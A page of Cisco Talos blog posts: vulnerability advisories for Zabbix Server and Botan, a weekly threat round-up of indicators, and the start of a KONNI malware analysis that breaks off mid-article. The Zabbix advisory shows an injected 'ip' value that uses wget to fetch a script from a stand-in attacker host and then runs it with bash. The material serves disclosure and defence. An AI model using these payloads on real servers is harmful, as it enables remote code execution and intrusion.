Quantcast
Channel: Cisco Talos Blog
Viewing all 1991 articles
Browse latest View live

Talos 2017 0325

$
0
0

TALOS-2017-0325

Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability

April 27, 2017

Report ID

CVE-2017-2824

Summary

An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X . A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.

Tested Versions

Zabbix Server 2.4.8.r1

Product URLs

http://www.zabbix.com

CVSSv3 Score

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-88: Argument Injection or Modification

Details

The vulnerability lies within the ìTrapperî section of the Zabbix Code, this is the network service that allows the Proxies and the Server to communicate (TCP Port 10051) There are a set of API calls that the Zabbix Server exposes to the Zabbix proxy, the two that will be discussed are the ìdiscovery dataî and ìcommandî requests. Example data of these requests are shown below:

'{"request":"command","scriptid":1,"hostid":10001}''{"request":"discovery data","host":"zabbix-proxy.com","clock":10,
"data":[{"clock":10,"drule":1,"dcheck2,"type":0,"ipî:î10.0.0.1î, "dns":"zabbix-agent.com",    	ìport":10050,"key":"test","status":0,"value":"test_value"}]}

It should be noted that the ìrequestî command invokes a script located in the Zabbix database without any authentication occurring (which might be considered a bug in itself).

Another pivotal aspect of the vulnerability is that by default, Zabbix 2.4.X populates the MySQL database with 3 scripts inside of the scripts table:

# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
# scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
# scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1

The problem lies in the fact that the {HOST.CONN} field actually gets replaced by the hostís IP address during the invocation of the script. The value that replaces {HOST.CONN} is located in the Zabbix ìinterfaceî table, and is stored as the ìIPî field as a VARCHAR(64). Thus, if an attacker can create an interface with a command injection as the IP address, and script with {HOST.CONN} is run via the ìcommandî request, the command injection will occur and a reverse shell can be gained.

The difficulty lies in actually getting a valid entry into the Zabbix ìhostî table. By default, an unauthenticated attacker cannot do this, it requires a minor configuration on the part of the system administrators, specifically in regards to Zabbixís Auto-discovery feature.

Zabbixís Auto-discovery and Auto-registration features allow for configuration of the Zabbix Server to occur based on the data presented Zabbix Server by the Zabbix Proxy. More specifically, if a hosts presents certain characteristics to the Zabbix Proxy, based on the configuration of the server, certain actions could be potentially taken, one of which causes the newly discovered host to get added to certain Zabbix database tables. When this occurs, a host is inserted into the ìhostsî table and also an entry into the Zabbix ìinterfaceî table will be created, with the IP address presented by the host being inserted into the IP column, without any validation of that IP address occurring.

Thus, by sending a ìdiscovery dataî request to the server with a suitable host, a command injection can be inserted into the database:

 write_script_cmd	=	'{
	"request":"discovery	data",
	"host":"zabbix-proxy.domain.fake",
	"clock":148535399,
	"data":[{
	"clock":1485353070,
	"drule":88,
	"dcheck":174,
	"type":0,
	"ip":";wget -O	/tmp/s	http://attacker-ip/s;#",
	"dns":"host28.domain.fake",
	"port":10050,
	"key":"sectest",
	"status":0,
	"value":"lnx<(^_^)>host"
}]}'

Due to the size limitation of the ëipí field of the Zabbix ìInterfaceî table, a second host was inserted into the table with another IP address.

// Host 2
ìipî:î;/bin/bash /tmp/s;#î

After these two hosts were added, there was still the issue of not knowing the hostidís for the ìcommandî request, but this was easily solved by brute forcing backwards into the database since the command request would return a different response if the host actually existed or not, and once the hostidís of the injected hosts were known, they could be invoked directly, and a reverse shell could be gained.

Mitigation

By removing the three default script entries inside of the Zabbix Serverís ìZabbixî database, an attacker would be unable to actually execute code, even if they can insert hosts with spoofed addresses into the database. This should not affect an organizations current operations, unless teh scripts are actually used. This proposed fix can either be done directly from the database (use zabbix; delete * from scripts;) or from the GUI interface (Administration -> Scripts -> Checkmarks -> ìDelete Selectedî/îGoî).

Credit

Discovered by Lilith Wyatt of Cisco ASIG

Timeline

2017-03-22 - Vendor Disclosure
2017-04-27 - Public Release


Talos 2017 0326

$
0
0

TALOS-2017-0326

Zabbix Proxy Server SQL Database Write Vulnerability

April 27, 2017

Report ID

CVE-2017-2824

Summary

An exploitable database write vulnerability exists in the trapper functionality of Zabbix Server 2.4.X . Specifically crafted trapper packets can pass database logic checks, resulting in database writes. An attacker set up a Man-in-the-Middle server to alter trapper requests made between an active Zabbix proxy and Server to trigger this vulnerability.

Tested Versions

Zabbix Server 2.4.8.r1

Product URLs

http://www.zabbix.com

CVSSv3 Score

7.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L

CWE

CWE-300: Channel Accessible by Non-Endpoint (‘Man-in-the-Middle’)

Details

One of the Trapper requests made by the Zabbix proxy is the ìproxy configî request, which allows a proxy to request its own proxy configuration from the Zabbix Server (or any other Zabbix Proxyís configuration if they know the hostname of that machine). When this occurs, the Zabbix Server pulls varying configuration for the given Zabbix Proxy from its database. While the Zabbix server has hardcoded tables that it looks at when searching for the desired configuration data to send to the proxy, there is no such restriction on what the Zabbix Proxy will apply to it is database.

Thus, if an attacker is able to man in the middle the traffic of a Zabbix Proxy and Zabbix Server, an attacker can insert arbitrary JSON into the configuration response of the Server, and the Zabbix Proxy will apply the configuration without hesitation. This is doubly concerning since the proxy configuration data flows unencrypted over the local network, allowing anyone with network connectivity to the Zabbix Server to utilize this attack.

Since the ìproxy configî request happens at regular intervals from the Proxy to the Server, an attacker can use a proxy server to intercept the traffic and insert arbitrary data into the database, as long as the destination table is a valid table in the Zabbix proxy database.

Credit

Discovered by Lilith Wyatt of Cisco ASIG

Timeline

2017-03-22 - Vendor Disclosure
2017-04-27 - Public Release

Talos 2017 0294

$
0
0

TALOS-2017-0294

Randombit Botan Library X509 Certificate Validation Bypass Vulnerability

April 28, 2017

Report ID

CVE-2017-2801

Summary

A programming error exists in a way Randombit Botan cryptographic library version 2.0.1 implements x500 string comparisons which could lead to certificate verification issues and abuse. A specially crafted X509 certificate would need to be delivered to the client or server application in order to trigger this vulnerability.

Tested Versions

Randombit Botan 2.0.1

Product URLs

https://botan.randombit.net/

CVSSv3 Score

6.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L

CWE

CWE-125: Out-of-bounds Read

Details

Botan is a C++ cryptographic library that implements the basis for practical systems that require TLS, PKIX certificate handling, password hashing or other cryptographic primitives.

There exists a programming error in code related to x509 distinguished name parsing. Namely, an x509 DN comparison function can lead to out of bounds memory access leading to unexpected results, information disclosure or potential denial of service.

The vulnerability is located in the overloaded equality comparison function Botan::x500_name_cmp:

bool x500_name_cmp(const std::string& name1, const std::string& name2)
	 {
	 auto p1 = name1.begin();
	 auto p2 = name2.begin();


	 while((p1 != name1.end()) && Charset::is_space(*p1)) ++p1;        [1]
	 while((p2 != name2.end()) && Charset::is_space(*p2)) ++p2;


	 while(p1 != name1.end() && p2 != name2.end())
			{
			if(Charset::is_space(*p1))                                     [2]
				 {
				 if(!Charset::is_space(*p2))                                 [3]
						return false;


				 while((p1 != name1.end()) && Charset::is_space(*p1)) ++p1;  [4]
				 while((p2 != name2.end()) && Charset::is_space(*p2)) ++p2;  [5]


				 if(p1 == name1.end() && p2 == name2.end())                  [6]
						return true;
				 }


			if(!Charset::caseless_cmp(*p1, *p2))                           [7]
				 return false;
			++p1;                                                          [8]
			++p2;
			}


	 while((p1 != name1.end()) && Charset::is_space(*p1)) ++p1;
	 while((p2 != name2.end()) && Charset::is_space(*p2)) ++p2;


	 if((p1 != name1.end()) || (p2 != name2.end()))
			return false;
	 return true;
	 }

First, at [1], initiall whitespaces are skipped. Then, strings are compared byte by byte in a loop while checking for whitespace at [2]. If a space occurs in the first string [2] and the second too [3], those are again skipped at [4] and [5]. Then, at [6], if both have reached an end, true is returned. If not, another comparison is made at [7] and if it passes, the pointers are increased at [8].

The vulnerability lies in the way whitespaces are handeled. If we are comparing two strings which are initially the same up to a space character, we would enter while loops at [4] and [5]. Now, if one string contains a NULL byte after that space, and the other has spaces until its end, the check at [6] won’t be true, because only the second string would point to its end. However, both are actually pointing at a NULL byte, which means the check at [7] will still hold true, and pointers are once again increased at [8]. Then when the loop rolls around, one of the pointers can point outside its allocated buffer, leading to unexpected behaviour.

A specially crafted x509 certificate with specific x509 DN strings for subject and issuer fields can be created. Example strings that satisfy the above conditions are:

String 1: AA\x20\x00AAAAAAAAAA
String 2:  AA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20

Notice that both are the same length, begin with same characters up until space after which the first is terminated and the second has spaces till the end. Because of the way these pieces of certificate are copied from the x509 file to their memory buffers, the first string’s length won’t be 3, that is, it won’t be terminated at the first NULL.

With careful control over X509 distinguished names contents and depending on memory layout in the target application, it could be possible to craft a certificate where equality checks could pass or fail. Also, a discrepancy between a way these malformed strings are handled in Botan and other x509 libraries could lead to other types of abuse, possibly not unlike the famed CVE-2009-2408.

The vulnerability can be triggered with the supplied example x509 certificate.

Crash Information

Address sanitizer output:

botan/botan cert_info --ber cert1.der 2>&1|  asan_symbolize -d
=================================================================
==15015==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000dfa3 at pc 0x7f027ec92e85 bp 0x7ffdf452fe60 sp 0x7ffdf452fe58
READ of size 1 at 0x60300000dfa3 thread T0
		#0 0x7f027ec92e84 in Botan::x500_name_cmp(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) botan/./src/lib/utils/parsing.cpp:232
		#1 0x7f027ec92e84 in ?? ??:0
		#2 0x7f027e269f2a in Botan::operator==(Botan::X509_DN const&, Botan::X509_DN const&) botan/./src/lib/asn1/x509_dn.cpp:153
		#3 0x7f027e269f2a in ?? ??:0
		#4 0x7f027ed8b8f4 in Botan::X509_Certificate::force_decode() botan/./src/lib/x509/x509cert.cpp:149
		#5 0x7f027ed8b8f4 in ?? ??:0
		#6 0x7f027ed85263 in Botan::X509_Object::do_decode() botan/./src/lib/x509/x509_obj.cpp:235
		#7 0x7f027ed85263 in ?? ??:0
		#8 0x7f027ed877b1 in X509_Certificate botan/./src/lib/x509/x509cert.cpp:50
		#9 0x7f027ed877b1 in ?? ??:0
		#10 0x5fcc93 in Botan_CLI::Cert_Info::go() botan/./src/cli/x509.cpp:85
		#11 0x5fcc93 in ?? ??:0
		#12 0x520ed5 in Botan_CLI::Command::run(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > const&) botan/./src/cli/cli.h:229
		#13 0x520ed5 in ?? ??:0
		#14 0x51ca4f in main botan/./src/cli/main.cpp:60
		#15 0x51ca4f in ?? ??:0
		#16 0x7f027d16982f in __libc_start_main /build/glibc-Qz8a69/glibc-2.23/csu/../csu/libc-start.c:291
		#17 0x7f027d16982f in ?? ??:0
		#18 0x42e328 in _start ??:?
		#19 0x42e328 in ?? ??:0


0x60300000dfa3 is located 0 bytes to the right of 19-byte region [0x60300000df90,0x60300000dfa3)
allocated by thread T0 here:
		#0 0x4ce458 in __interceptor_malloc ??:?
		#1 0x4ce458 in ?? ??:0
		#2 0x7f027f296e77 in operator new(unsigned long) ??:?
		#3 0x7f027f296e77 in ?? ??:0
		#4 0x7f027e272283 in std::pair<std::__decay_and_strip<Botan::OID const&>::__type, std::__decay_and_strip<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>::__type> std::make_pair<Botan::OID const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>(Botan::OID const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /usr/bin/../lib/gcc/x86_64-linux-gnu/5.4.0/../../../../include/c++/5.4.0/bits/stl_pair.h:281 (discriminator 4)
		#5 0x7f027e272283 in void Botan::multimap_insert<Botan::OID, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >(std::multimap<Botan::OID, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::less<Botan::OID>, std::allocator<std::pair<Botan::OID const, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >&, Botan::OID const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) botan/build/include/botan/internal/stl_util.h:79 (discriminator 4)
		#6 0x7f027e272283 in ?? ??:0
		#7 0x7f027e2671eb in Botan::X509_DN::get_attributes[abi:cxx11]() const botan/./src/lib/asn1/x509_dn.cpp:78 (discriminator 1)
		#8 0x7f027e2671eb in ?? ??:0
		#9 0x7f027e269d49 in Botan::operator==(Botan::X509_DN const&, Botan::X509_DN const&) botan/./src/lib/asn1/x509_dn.cpp:138 (discriminator 1)
		#10 0x7f027e269d49 in ?? ??:0
		#11 0x7f027ed8b8f4 in Botan::X509_Certificate::force_decode() botan/./src/lib/x509/x509cert.cpp:149
		#12 0x7f027ed8b8f4 in ?? ??:0
		#13 0x7f027ed85263 in Botan::X509_Object::do_decode() botan/./src/lib/x509/x509_obj.cpp:235
		#14 0x7f027ed85263 in ?? ??:0
		#15 0x7f027ed877b1 in X509_Certificate botan/./src/lib/x509/x509cert.cpp:50
		#16 0x7f027ed877b1 in ?? ??:0
		#17 0x5fcc93 in Botan_CLI::Cert_Info::go() botan/./src/cli/x509.cpp:85
		#18 0x5fcc93 in ?? ??:0
		#19 0x520ed5 in Botan_CLI::Command::run(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > const&) botan/./src/cli/cli.h:229
		#20 0x520ed5 in ?? ??:0
		#21 0x51ca4f in main botan/./src/cli/main.cpp:60
		#22 0x51ca4f in ?? ??:0
		#23 0x7f027d16982f in __libc_start_main /build/glibc-Qz8a69/glibc-2.23/csu/../csu/libc-start.c:291
		#24 0x7f027d16982f in ?? ??:0


SUMMARY: AddressSanitizer: heap-buffer-overflow (botan/libbotan-2.so.0+0xc38e84)
Shadow bytes around the buggy address:
	0x0c067fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c067fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c067fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c067fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c067fff9be0: fa fa fa fa fa fa 00 00 03 fa fa fa fd fd fd fa
=>0x0c067fff9bf0: fa fa 00 00[03]fa fa fa fd fd fd fa fa fa 00 00
	0x0c067fff9c00: 00 04 fa fa fd fd fd fd fa fa 00 00 00 03 fa fa
	0x0c067fff9c10: fd fd fd fd fa fa 00 00 00 03 fa fa fd fd fd fd
	0x0c067fff9c20: fa fa 00 00 05 fa fa fa fd fd fd fa fa fa 00 00
	0x0c067fff9c30: 07 fa fa fa fd fd fd fa fa fa 00 00 01 fa fa fa
	0x0c067fff9c40: 00 00 00 fa fa fa fd fd fd fa fa fa fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
	Addressable:           00
	Partially addressable: 01 02 03 04 05 06 07
	Heap left redzone:       fa
	Heap right redzone:      fb
	Freed heap region:       fd
	Stack left redzone:      f1
	Stack mid redzone:       f2
	Stack right redzone:     f3
	Stack partial redzone:   f4
	Stack after return:      f5
	Stack use after scope:   f8
	Global redzone:          f9
	Global init order:       f6
	Poisoned by user:        f7
	Container overflow:      fc
	Array cookie:            ac
	Intra object redzone:    bb
	ASan internal:           fe
	Left alloca redzone:     ca
	Right alloca redzone:    cb
==15015==ABORTING

Mitigation

Adding another check which tests if either string is at the end while the other is not, which would make them different, is enough to resolve this vulnerability:

diff --git a/src/lib/utils/parsing.cpp b/src/lib/utils/parsing.cpp
index 8fd2ccc..ce4b02f 100644
--- a/src/lib/utils/parsing.cpp
+++ b/src/lib/utils/parsing.cpp
@@ -240,6 +240,11 @@ bool x500_name_cmp(const std::string& name1, const std::string& name2)
					if(p1 == name1.end() && p2 == name2.end())
						 return true;
+         if(p1 == name1.end() || p2 == name2.end())
+            return false;
					}


			 if(!Charset::caseless_cmp(*p1, *p2))
					return false;

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.

Timeline

2016-03-16 - Vendor Disclosure
2017-04-28 - Public Release

Threat Round-up for Apr 21 - Apr 28

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 21 and April 28. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:
  • Doc.Macro.MaliciousHeuristic-6298845-0
    Office Macro
    Office macro code is used to further compromise a target system. Macros can leverage external system binaries to execute other binaries to further compromise the system. This signature looks for code associated with hiding the core functionality by including junk code.
     
  • Win.Dropper.DarkComet-6301230-0
    Trojan/RAT dropper
    This is a malware dropper. It currently drops the DarkComet RAT. The file is a slightly modified version of wextract.exe, a legitimate Windows tool to unpack archives. The malware payload is stored in the resource section of the binary. The dropper binary is actually a multi-format file, and can be interpreted both as a PE executable as well as a cab archive. The modified Windows binary will extract the payload binary from itself and run the extracted file.
     
  • Win.Trojan.ServStart
    Trojan
    ServStart is a trojan that installs a persistent service on the victim’s machine. The service exfiltrates information about the infected computer including machine name, username, keyboard language, and computer performance specifications. The malware server can respond with commands to download and execute files, or execute shell commands. ServStart has been observed using multiple dynamic DNS providers for its command and control infrastructure.
     
  • Win.Trojan.Agent-6298180-0
    Trojan (credential stealer)
    This sample attempts to collect stored credentials from a number of installed applications and then attempts to transmit those credentials back to a PHP application on a possibly compromised server.
     
  • Win.Trojan.PWS-6299789-0
    Password stealer, injector
    PWS (also known as Fareit or Chisburg) is a credential & sensitive information harvester. Select information such as banking credentials or web browser password databases are queried for on the infected host. Any discovered data is propagated to a C2. These recent samples are protected with the Armadillo packer & rely on both code injections & dropped VBScript code.
     
  • Win.Dropper.Emotet-6301061-0
    Dropper
    This dropper is delivered through different mechanism, most of the time the victims is redirected to a website to get it through malicious pdf, http iframe injected. Once running on the computer the binary is gathering details on volume disk drive and other details, injecting process, dropping itself and contacting internet to execute more. Websites observed delivering ransomware and trojan banker.


    Threats

    Doc.Macro.MaliciousHeuristic-6298845-0

    Indicators of Compromise

    Registry Keys
    • N/A
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • storefronts[.]pl
    File Hashes
    • 23b90b1c55fdbbd371655da0ccf359e891deb51ed5bbc0ac772c5d572f4b3a42
    • 2471636a92daa0a54095aa66b55ad2fea5fd5d6372b0be9d65d1d1e2cef31bd5
    • 2b24221aabc8cd18e756a579b29a005fc9c33213f5ec963b9b6ccf4e6187b23b
    • 4b781b8370f973b9204b44c8ce3615692fc66c1613967a44924984d35fba7bc4
    • 4ee6b9bb8e903bed9a82c7dad6d62163e3a4f759ade5f5f8fcf899945bfd9264
    • 564c37dcd8322bd6e8cabc788f982a35f7d3e335c3d736ce544fc17a6b090183
    • 59b54e7c4e052adbc1d64dc61623af6f55db1a8692b373cb6ca871ba087feaac
    • 6930d456c506c94b9e19a08659181b7d376254dca652d0e56c305764867578d2
    • 6a0eae0addd6ce84966ac1bd006e9582036eaaa1011a38190f700871cc37de24
    • 7045d8f339cab73cf0ec7f31a7b3a31a84057f0b275f789f4bfed9dffee35564
    • 7638745d08de218fa16e9c0828ed0a1139223d3ebddf4bb528bc3ae185cea90e
    • 81cdded9aa21513ad9c6ae04455a7fce68129135f3358b9c5e28a80139e78f21
    • 93472e054b4b4fcc54a71a32b6275f8b35c8ef84490248d21c094f19a537c773
    • a0bfeb90468ddf50a3c85d5074e002b1d89995d6377eceeb0781ba5292facbcc
    • b3dfdfcfea160ed34eb69da55909294f78d2b5a6320cbf5151a3da01c6449631
    • c185559d0a38e782167beacff78a7a72544d82890b5e5723e6a25a70e6e16d59
    • d2c1b89129e3e26544bfbef3fac4567c3629817a98ded9ce5c7dee485d0364a9
    • f2e4fe273c4a8cc1cd7799d5558c58b8a08dfe160235dfa2eb2a8bad9bba40aa
    • 02481825e922c38ba797ebc18d5a8273ede8c5a4d52eecd2f58eb569533d780b
    • 06736e5f3127a54bbe6bb25f4a82ca95371e5cc8654a893c02d3d4e677e0b916
    • 21b039f3171f26911290dad3e1ce0da6d6d3545e11f9a119408922ac2ae06db6
    • 2643f9f8dce45983eac80feeebd16adbd498e3a644ef8b05bc40448be9342ddf
    • 2ac6b5487c69427476b48bcbbddd7646842e02363a0d4ebe1b1998da6d1f55a8
    • 2dad87b69ee91bfa71d911b791e5468efb6ce689ccc4cde3e91626cbfcfc14ab
    • 2f4853b54c36adf9ca9fbb163dacedee78b6b027fac3c24c72120e9d8cc6f01e

    Coverage


    Detection Screenshots

    AMP


    ThreatGrid


    Umbrella


    Malware





    Win.Dropper.DarkComet-6301230-0

    Indicators of Compromise

    Registry Keys
    • N/A
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • N/A
    File Hashes
    • 05C8DE4B97737440913F5C714082AD647281FA50F1904B1BF11EDB8560294FAC
    • 07D9D6DA8C6CD162DD9FC78AC48EAF82BC49D4239908AF354E44C4822FE06D62
    • 099ADD24586D77C5F2B8EFB9C33A8A11B5A0C11001A8534D9635A674ADC260AD
    • 0A155F4F20367E4D23B6D238208FA5F943A1341E47BDBB2DBC520CCB27AD120B
    • 150420EDB4BF00DADCF71601781DBE3BD6E34CBA767153B9F82307EDDF391395
    • 15F2BB3B4A12A6F5B0965FDE62AE21B2796D7659BBA8011FC22AF40D465984BE
    • 318B2A4F06345E95C63E4623F52E0E7C57257548C74E0C7A272FCB64D3F49692
    • 4B0BB06E09ED0B2EDB085641E125490E9B1A6CC5652C05C77C78E47CF9448D35
    • 507874BA705282183F928D3AE11ED5497A0F1EAC3368DE75C392D17749CB8EE9
    • 55FDFC65C0C10A958239E0447E5696989FE66557437EB725849BB578D882D74E
    • 5D31C073C4B7322A7DE871D533D520DE2444466D0C944CB06F6244D2CE57D49D
    • 6597E2DD82FC203BA2C609B358B2E0CAE37A4309808626DA27BD58614077D646
    • 6A23031FDD70C6D57D8FE9C8D3EFE6A423C38BF2D46B9B24959E5CA7D0714FCA
    • 6C652B0E4998456F150515EBF50CA569CF373BA709442F6909DD7D4330C83D2E
    • 6EB12C46F0605D8F915C8E895FC70D189D9E8825775EBDB464A9A24834887E60
    • 776B2679819B1E0385E1630EEEC50190DAAAEC0EEF9F659EE728C47991FABFBB
    • 77FA104262E3FF983B3418540FF744E0EAAE5E66388333ED785EF6F5AA2801F9
    • 7D6765A1F6589A554457D9363F702F65E81DDDA52EB62C600250E0F94C473A16
    • 8590486CD299DAA9BF42497EF28028364E4E18B6C60B725736A7D2DDC73BBC2F
    • 92EABA06563800BA670249E90D91C32F9D315889439BCAA73F24D2C08E285B84

    Coverage


    Detection Screenshots


    AMP


    ThreatGrid




    Win.Trojan.ServStart

    Indicators of Compromise

    Registry Keys
    • HKLM\SYSTEM\CONTROLSET001\SERVICES\NATIONALLWC\Description
      "Providesufl a domain server for NI security."
    Mutexes
    • Nationallwc
    IP Addresses
    • N/A
    Domain Names
    • syhaw1516.codns[.]com
    • wrop0422.codns[.]com
    • ansbase.9966[.]org
    File Hashes
    • fbbc6852ff1947fcd820b90e60ab71af93ffad079bd13a0d2b514955bb1c9d62
    • 40eddfac964b69ee2e26742faaacfe50960fa0232a1b9a11c382e61cecd700ff
    • 6106eda3ae39449fec42db2caf4f1b5f994d72b5a759dddfd77a8a29ebb3f497
    • c106435a2aced27d03ee5531eda025b14cec106106a1c7ca750127090f6d2039
    • 8d4366eff17da1c18ab3fed1692628756a8f41f3145877f895b7ef950055262f
    • 3be7ab79f032cf24b09fc05b08544fd61ec7e3fd355f8ab7b4580eb43d8c3e55
    • ff6b7320d6b75a638c0f2d024f43853dd78993276a8f6b5f7463d6317858dd9c
    • c9a193d273f606860bee0dd4a878a6421233b05ac4c6faf357d9324f0d6a575a
    • 932d8d5829570237e9ab7688dd2d3c03812a05157f72af124cabf530be583789
    • ba07a79a2f4d51eaac585b0f50e3b1e61d8fc555592aadb1e5d3916fb26b0e27

    Coverage


    Detection Screenshots

    AMP


    ThreatGrid


    Umbrella




    Win.Trojan.Agent-6298180-0

    Indicators of Compromise

    Registry Keys
    • N/A
    Mutexes
    • N/A
    IP Addresses
    • 212.129.14[.]211
    Domain Names
    • tranexestin[.]com
    File Hashes
    • afc3ba4941b89a4467e2f1a4ab0df2c88ef5e39264182a4b3a2dbbfa5b022e3f

    Coverage


    Detection Screenshots

    AMP


    ThreatGrid


    Umbrella




    Win.Trojan.PWS-6299789-0

    Indicators of Compromise

    Registry Keys
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    • \MACHINE\Software\Wow6432Node\Microsoft\Tracing
    • \MACHINE\Software\Wow6432Node\Microsoft\Tracing\tmpVtFw4a_RASMANCS
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\Microsoft
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\Software\Microsoft\Visual Basic\6.0
    • \MACHINE\Software\Wow6432Node\Microsoft\Tracing\tmpVtFw4a_RASAPI32
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\Software
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
    • MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\Visual Basic
    • USER\S-1-5-21-2580483871-590521980-3826313501-500\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
    Mutexes
    • N/A
    IP Addresses
    • 92.53.96[.]120
    Domain Names
    • cv42569.tmweb[.]ru
    File Hashes
    • dddde27836842e0f950b5622e1be7a0f51072db573b2f2e41d20d4b4c45028d8
    • dc086f745c35b2abe58675e546b475ed64f15ea6e9d4492a0502476f784ea85c
    • 97cd05c529002b85ae756a9e7b7da7a538026583f0886a235cf48b72c378551a
    • 2992c6ce7ccda6fef751a912eafb8a31e3426bde8964ccf31b0512390bd61615

    Coverage


    Detection Screenshots

    AMP


    ThreatGrid


    Umbrella





    Win.Dropper.Emotet-6301061-0

    Indicators of Compromise

    Registry Keys
    • N/A
    Mutexes
    • N/A
    IP Addresses
    • 188.165.220[.]214
    Domain Names
    • N/A
    File Hashes
    • f566fdc382f6988599cb16894d8a9a92e291d83574834de705d6367b520b6b50
    • dda1fffa38e3f9d30833d201b542422aed15a41253b2a72797ad38dfba8fe535
    • 6d4fa878e2930cb3bedc2078855f6d7db7b6b136464f6dff256d8c62657b505f
    • 8ad1c1655d6d3b2a4931ae2dd9eb4e3b7be488a7f39b9c396fe1eeda2eda05a7
    • c0e8a92ba6ce12d803ecfccd01432f855e6fd9ad19825602a74a081459e25389
    • 5598fdcc6c0c2e7bdb095193a5f986e6cf22fdcca26c2e8451c46d787ef18435

    Coverage


    Detection Screenshots

    AMP


    ThreatGrid


    Umbrella

    KONNI: A Malware Under The Radar For Years

    $
    0
    0
    This blog was authored by Paul Rascagneres

    Executive Summary


    Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI.

    Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time. In this article, we will analyse this evolution:

    • at the beginning the malware was only an information stealer without remote administration
    • it moved from a single file malware to a dual file malware (an executable and a dynamic library)
    • the malware has supported more and more features over the time
    • the decoy documents have become more and more advanced
    • The different versions contain copy/pasted code from previous versions. Moreover the new version searches for files generated by previous versions. (This implies that the malware has been used several times against the same targets)
    This evolution is illustrated across 4 campaigns: one in 2014, one in 2016 and finally two in 2017. The decoy document of the 2 last campaigns suggests that the targets are public organisations. Both documents contained email addresses, phone numbers and contacts of members of official organizations such as United Nations, UNICEF, and Embassies linked to North Korea.

    3 Years Of Campaigns


    2014 Campaign: Fatal Beauty


    In this campaign, the dropper filename was beauty.scr. Based on the compilation date of the two binaries, this campaign took place in September 2014. Once executed, two files were dropped on the targeted system: a decoy document (a picture) and a fake svchost.exe binary. Both files were stored in "C:\Windows". The picture is a Myanmar temple:
    The fake svchost binary is the KONNI malware. The first task of the malware is to generate an ID to identify the infected system. This ID is generated based on the installation date of the system, as found in the registry (HKLM\Software\Microsoft\Windows NT\CurrentVersion\InstallDate). The second task of malware is to ping the CC and get orders. The malware includes 2 domains:
    • phpschboy[.]prohosts[.]org
    • jams481[.]site[.]bz

    The developer used the Microsoft Winsocks API to handle the network connection. Surprisingly, this isn't the easiest or the most efficient technical choice for HTTP connection. The malware samples we analysed connected to only one URI: <c2-domain>/login.php.

    This version of KONNI is not designed to execute code on the infected system. The purpose is to be executed only once and steal data on the infected system, here are the main features:
    • Keyloggers
    • Clipboard stealer
    • Firefox profiles and cookies stealer
    • Chrome profiles and cookies stealer
